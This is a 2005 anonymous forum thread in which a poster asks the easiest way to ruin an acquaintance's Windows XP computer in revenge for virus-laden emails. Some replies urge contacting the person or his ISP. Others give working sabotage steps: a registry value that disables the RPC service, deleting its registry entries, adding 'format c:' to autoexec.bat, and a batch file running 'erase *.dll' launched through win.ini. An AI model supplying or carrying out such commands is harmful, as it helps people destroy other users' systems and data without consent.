Easiest way to ruin a PC running XP

Name: Anonymous 2005-07-26 22:46

Just kinda curious what is the easiest way to fuck up someones computer? Im not exaclty a pro at this sort of thing but some jackass (which i also happen to know in person) has been sending crap to my email which my antivirus sez is harmful (i opened the first one on another computer (R.I.P), but he keeps sending stuff). What I would like to know is where he gets this stuff? And, is there a smart way to retaliate or should I just let him be?

(note: id prefer to be able to return the favor, but ill stick to whatever is a more sound decision)

He probably has a virus.

What are you going to fuck up? It's already fucked.

Step One:  Inform him of what's happening. Give him one shot to correct the issue.

Step Two:  If Step One fails, contact his ISP.

It might be him, but bear in mind that a lot of email worms spoof the sender address. I've had emails to my Yahoo account in the past from people complaining about receiving viruses from me, people who are evidently too stupid to realize that web-based email is not susceptible to your computer getting infected with anything.

Unless he's a weenie who thinks its funny to send viruses to you, it's more likely that he's been infected with a worm that is trying to propagate to everyone in his address book. Tell him to sort it out. The internet is pretty sick of people whe can't secure themselves and get turned into spam zombies.

Plus no one tells you when you are sending crap randomly. Unless you are already one of those "ZOMG FUNNYJOKE send send send send" people.

My favorite way to ruin someone's pc is to dissable thier RPC, which cannot be reinabled without going into the registy and enableing it. Everything in windows relys on the RPC, so dissabling reverts them back to a place where you can't even cut and paste a file.
Here's how to break it
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RpcSs]
"Start"=dword:00000004
This is done on a per user basis so if the computer has multiple users, you have to impliment it to controlset002 and so forth.

Or if you want to really ruin the system irriversably, delete all registry entries or RPCSs.

Ew really? Glad I don't use that crap.

Something simular can be done to other operating systems as well. It's RPC's job to communicate between the daemons of the system. Thrings break when they can't talk to eachother

Except that RPC is designed to be an abstraction allowing processes on remote machines to communicate as if they were local.

Name: Anonymous 2005-07-27 18:24

um,... so in plain english, how is this done?

Are you >>1? Then grow the fuck up already.

Only a 13 year old jackass would think of this. Why not go out to the playground and get beaten up instead? This is pathetic.

Every good OS does the same

The RPC serves as both, at least it does on 2k. I've done it to myself, and thats how I found out.

Let's adopt him. Teach him to be a good citizen of the internet in a way his parents never could. Child of 4chan.

If you lack the technical knollege on using regedit, you shouldn't be using it in the first place. You can seriously fuck up the system irriversable. The RPC has generaly is a on off switch. 2 is enabled, 4 is dissabled. If you fuck up, you can permantly ruin the registly and would have to reinstall the whole system, or if the person is stupid enough to have their autobackus on XP (Which make vires a pain in the ass to removr) it will make it very easy to recover from such an occurance.

Kicking the computer is the fastest way to fuck it up. Give it a good swift kick in the power supply.

Alternatively, ejaculate on the ram.

Name: Anonymous 2005-08-01 7:15

A friend of mine used to have a habit of randomly editing his registry to see what would happen. He averaged 2 reinstalls a week.

This is the best advice that has ever been, or will ever be given in this forum. You win all the internets, good sir!

#1 Go to C: on your computer, find autoexec.bat, add "format c:" into it and reboot.

#2 Make a text file with "erase *.dll" in it. Save it as test.bat in C:\WINDOWS\System32\. Open up win.ini under C:\WINDOWS\ and type in Run=C:\WINDOWS\System32\test.bat

Or you could just open up the computer and give the cords a nice pull. Equally crude, more effective results

Don't change these.
